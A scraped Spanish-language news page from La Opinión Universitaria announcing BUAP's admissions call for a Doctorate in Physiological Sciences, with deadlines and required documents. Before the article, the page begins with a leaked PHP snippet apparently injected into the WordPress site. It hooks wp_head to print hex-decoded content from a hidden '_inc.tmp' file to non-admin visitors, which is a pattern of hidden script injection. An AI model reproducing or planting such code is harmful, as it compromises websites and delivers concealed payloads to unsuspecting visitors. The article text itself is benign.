if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Lanza BUAP convocatoria para estudiar Doctorado en Ciencias Fisiológicas   – La Opinión Universitaria La Opinión Universitaria
Menu

Lanza BUAP convocatoria para estudiar Doctorado en Ciencias Fisiológicas  

 

  • El programa académico está integrado al Padrón Nacional de Posgrados de Calidad

Por Diego Cuautle

Con el objetivo de formar científicos en el área de las Ciencias Fisiológicas y fomentar las actividades de investigación y docencia, la Benemérita Universidad Autónoma de Puebla (BUAP), lanzó la convocatoria para estudiar el Doctorado en Ciencias Fisiológicas del Instituto de Fisiología.

El documento señala que la recepción de documentos será a partir de este 10 de febrero teniendo como fecha límite el 30 de abril. La presentación del proyecto será del 18 al 29 de mayo y el 3 de agosto se inician las actividades el 3 de agosto.

Cabe señalar que otros de los objetivos de dicho programa académico es preparar fisiólogos capaces de usar apropiadamente el método científico para plantear y resolver problemas en las ciencias fisiológicas.

También se busca formar científicos que contribuyan a la generación de conocimiento básico original en el área de las Ciencias Fisiológicas de la BUAP que pertenece al Padrón Nacional de Posgrados de Calidad (PNPC) del Consejo Nacional de Ciencia y Tecnología (Conacyt).

Entre los requisitos que se requiere es tener grado de Maestro en Ciencias o su equivalente con un promedio mínimo de 8.5, enviar vía correo electrónico a admision.fisiologia@correo.buap.mx en formato PDF del Curriculum Vitae, comprobante de domicilio, acta de nacimiento, CURP reciente e identificación oficial con fotografía.

Anexar el Título de maestría, cédula profesional y certificado de calificaciones (digitalizados de original a color; no de copia ni fotografía). Si aún no se cuenta con título y/o cédula, presentar un comprobante que indique que se encuentran en trámite.

Para el caso del aspirante que haya realizado estudios del nivel inmediato anterior en el extranjero: Apostillado del título y cédula.

La Carta de equivalencia del promedio general obtenido, en la escala de 0 a 10, emitido por la IES-CII, Copia de su VISA y TARJETA de Residente Temporal Estudiante (TRTE) y finalmente presentar un proyecto de tesis doctoral avalado por un investigador del Instituto de Fisiología.

Cabe señalar que los doctores en Fisiología egresan con conocimientos amplios en la investigación experimental y el conocimiento de los problemas actuales abordados por la fisiología. Son investigadores con independencia para plantear y resolver problemas científicos de la fisiología. Tienen la capacidad de enseñar su conocimiento científico a otros fisiólogos que recién ingresan a las ciencias fisiológicas.

  • Tweets recientes